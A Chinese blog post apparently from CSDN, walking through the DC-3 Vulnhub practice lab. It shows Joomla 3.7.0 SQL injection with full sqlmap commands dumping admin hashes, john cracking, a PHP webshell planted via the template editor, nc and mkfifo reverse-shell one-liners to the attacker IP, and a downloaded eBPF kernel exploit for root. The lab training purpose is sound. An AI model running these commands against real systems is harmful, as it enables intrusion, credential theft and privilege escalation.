DC3靶机练习

最新推荐文章于 2022-09-21 14:55:58 发布
最新推荐文章于 2022-09-21 14:55:58 发布
阅读量212 收藏
点赞数
分类专栏: # DC靶机渗透 文章标签: 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LSYZWF/article/details/116070751
版权

文章目录


实验环境:DC-3靶机,kali攻击机,net模式下进行实验

靶机:
链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw

1、信息收集

在这里插入图片描述
查看虚拟机的MAC地址

在攻击机下扫描C网段

nmap -sP 192.168.246.0/24 -oN namp.sP

在这里插入图片描述
得到目标主机的ip地址后,继续扫描开靶机开放的端口

nmap -A 192.168.246.141-p 1-65535 -oN namp.A

在这里插入图片描述
开放了80端口,可以去访问相关网页

可以扫描网站目录,但是毫无收获

2、网站指纹识别

使用whatweb

whatweb http://192.168.246.141

在这里插入图片描述
发现该网站使用的CMS是Joomla

使用joomscan进行扫描(需要自己安装)
工具安装:

git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl
参考连接:http://www.52bug.cn/hacktool/5336.html

perl joomscan.pl --url 192.168.246.141

在这里插入图片描述

后台登录网址:http://192.168.246.141/administrator/

3、然后根据版本信息查询漏洞里用模块

利用searchsploit joomla 3.7.0

发现了一个sql注入点
在这里插入图片描述
然后利用该注入点进行漏洞利用
在这里插入图片描述
直接有sqlmap命令,所以只需要更改地址然后执行命令
在这里插入图片描述
列出来mysql数据库中所有数据库的名字

这就证明sql注入漏洞存在

4、现在需要获取后台管理员的账户与密码

所以需要知道存在于哪一个数据库当中,所以继续利用sqlmap进行测试,只需要更改参数即可
获取当前数据库的名字

sqlmap -u “http://192.168.246.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”
–risk=3 --level=5 --random-agent --current-db -p list[fullordering]

在这里插入图片描述

当前数据库的名字为joomladb

获取数据库中的表信息

sqlmap -u
“http://192.168.246.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”
–risk=3 --level=5 --random-agent -D “joomladb” --tables -p list[fullordering]

共有76张表,其中存放用户信息的表在#__user表中
在这里插入图片描述

获取表中的字段信息

sqlmap -u
“http://192.168.246.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”
–risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering]

在这里插入图片描述
获取字段相关内容

sqlmap -u
“http://192.168.246.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”
–risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” -C “name,password” --dump -p list[fullordering]

在这里插入图片描述

得到了用户与加密的密码,现在需要对其进行解密

使用john工具对哈希值进行爆破
在这里插入图片描述
成功得到密码为snoopy

输入用户名与密码登录网站后台

5、随便浏览网站后台,发现一个模板目录

在这里插入图片描述
进去后发现有php文件,并且可以编辑文件
在这里插入图片描述

找到文件目录,上传木马

寻找到之前扫描到的目录

http://192.168.246.141/administrator/templates

打开但是没有beez3这个目录,根据对Joomla的了解,目录一般就放在根目录的templates目录下

查看有没有beez3这个目录

打开网址http://192.168.246.141/templates/beez3/

发现网页空白,表示网页存在
在这里插入图片描述

发现了modules.php文件,然后也发现了网站了后台存在modules.php文件
在这里插入图片描述
在这里插入图片描述
创建以后存在该目录,创建一句话木马
在这里插入图片描述
保存成功
在这里插入图片描述
访问这个文件表示成功
在这里插入图片描述
使用蚁剑进行连接
在这里插入图片描述
打开虚拟终端
在这里插入图片描述
6、需要进行提权
反弹shell
在kali主机上设置监听
nc -lvvp 2333
在虚拟终端上执行
nc -e /bin/bash 192.168.246.130 2333

-e 参数不可用

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.246.130
2333 >/tmp/f

反弹成功
在这里插入图片描述

7、提权

靶机当前的系统为ubuntu 16.04
searchsploit ubuntu 16.04
在这里插入图片描述

cp /usr/share/exploitdb/exploits/linux/local/39772.txt

ubuntu1604_shell.txt cat ubuntu1604_shell.txt

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

在反弹shell 的界面测试,发现访问失败,原因是我们的电脑无法访问国外的服务器

解决方法:我们先将39772.zip 文件下载至本地,本地搭建服务器,将文件上传至服务器,

我们直接访问本地服务器下载文件即可

将下载好的安装包放到/var/www/html目录下,然后开启apache服务

在shell中下载文件wget http://192.168.246.130/30772.zip
在这里插入图片描述

解压
unzip 39772.zip

cd 39772
在这里插入图片描述

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit
在这里插入图片描述

./compile.sh

./doubleput
在这里插入图片描述

DiliLearngent
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DC-6靶机练习
SYJ_361的博客
03-27 3593
本文是对DC-6靶机练习,利用kali通过网址信息暴力破解用户名,并登录wordpress,并在kali中找到对应的攻击模块,并进行远程登录,然后再对靶机进行提权
DC靶机系列——DC-7练习
shenpanzhimao的博客
03-01 863
DC靶机系列——DC-7练习 DC-7的端口服务只有22和80端口,也就是ssh登录和web服务。 在探测web服务的过程中,没有找到相应的web漏洞。 这里就要想办法通过侧面来进攻,考验的是对信息的敏感性。发现有一个@DC7USER,放在谷歌搜索一下,发现一个twitter和github,在github里面存在敏感信息,猜测可能是ssh的密码,果然进入。 获取初步权限后,继续在低权限情况下进行信...
靶机练习:DC-5靶机复现
m0_63755076的博客
09-21 246
这是可以查看一些信息,本系统为nginx,所以可以查看一下日志信息,nginx日志的默认日志路劲为/var/log/nginx/,一般nginx的日志都有access.log和error.log文件,随便访问一个试试。发现是thankyou.php中包含了footer.php页面,上述扫出来的结果也让我想起可能是目录包含,姑且试一试。证明已经写入了access.log文件,写入反弹shell并监听。发现开放了80和111,首先访问80端口进行查看.进入到root的目录下,查看文件。
39772.zip靶机所用文件66
08-11
dc3靶机所用文件
DC-3靶机
m0_62094846的博客
02-20 3122
ifconfig nmap 192.168.61.0/24 nmap -A -p- 192.168.131 使用网站指纹工具whatweb识别靶机网址使用的web服务、系统版本、CMS系统等 whatweb http://192.168.61.131 发现靶机使用Joomla内容管理系统 使用joomscan扫描工具扫描Joomla相关配置内容、已知漏洞等等 扫描后得知Joomla版本3.7.0,管理员登录页面,及一些可以访问的网站目录 joomscan --u 192.168.61
DC3靶机渗透测试练习
10-05
DC3靶机渗透测试练习 DC3靶机渗透测试练习是网络安全领域中的一个重要实践项目,旨在帮助安全测试人员和渗透测试人员提高自己的技能和经验。本文将详细介绍 DC3靶机渗透测试练习的各个阶段和步骤,以及每个阶段的...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
高清RAW图片,供Lrfans练习.zip
03-20
高清RAW图片,供Lrfans练习,未经过任何软件处理过的原始照片,可以用于Potoshop学习作为原素材使用
.Net Core IIS部署安装文件.zip
04-22
.netcore iis部署文件,其中包含两个安装包dotnet-hosting-2.2.0-win.exe和DotNetCore.1.0.4_1.1.1-WindowsHosting,安装后.net core项目就可以在iis中部署了。
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
DC-3靶机 渗透测试
她叫常玉莹
07-18 2862
DC-3查看靶机mac地址获取IP地址NmapJooScansqlmapjohn上传Webshellnc反弹提权 DC-3只有一个目标获得root权限,拿到flag。 查看靶机mac地址 00:0C:29:0D:D3:78 获取IP地址 使用arp-scan扫描 得知靶机IP地址 192.168.0.104 Nmap 使用nmap扫描收集靶机信息 nmap -sV -p- 192.168.0.104 看到靶机开放了80端口,访问一下 http://192.168.0.104:80 在wappaly
DC系列(3)DC-3靶机渗透
Nikris的博客
01-10 1385
DC-3
DC-3靶机笔记
weixin_43263451的博客
08-16 468
DC-3DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginners in m...
靶机渗透测试实战(三)——DC-3
weixin_45116657的博客
10-10 3349
实验环境 靶机(DC-3),IP地址未知; 测试机kali,IP地址:192.168.85.131 实验步骤: 1、 主机扫描 命令:1. Arp-scan -l 没有发现靶机IP,判断靶机没有分配到IP地址,因此先进去单用户设置网络 2、重启靶机 2.1> 启动系统后,我们按e键进入grub模式; 2.2> Ctrl +x 进入单用户模式; 2.3> 进入编辑...
DC靶机系列——DC3练习
shenpanzhimao的博客
03-01 1882
DC靶机系列——DC3 靶机地址: DC-3 1、Recon阶段 1.nmap扫描网段 得到目标 192.168.99.102 开启端口 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:1C:53:6A 显然是一个网页渗透 2.浏览器...
DC-5靶机练习
千寻的博客
01-08 2253
DC-5靶机练习 文件下载链接 第一部分 信息收集 第一步 信息收集 第二步扫描开放的端口 第三步 访问80端口 [ 打开Contact页面,发现是一个留言板块,在留言板块输入内容并提交] 第四步:观察网页 第二部分 文件包含漏洞 第一步:使用BurpSuite抓包,爆破后台页面 [发现存在index.php,solutions.php,about-us.php,faq.php,co...
渗透DC-1靶机设计思路
最新发布
05-24
3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值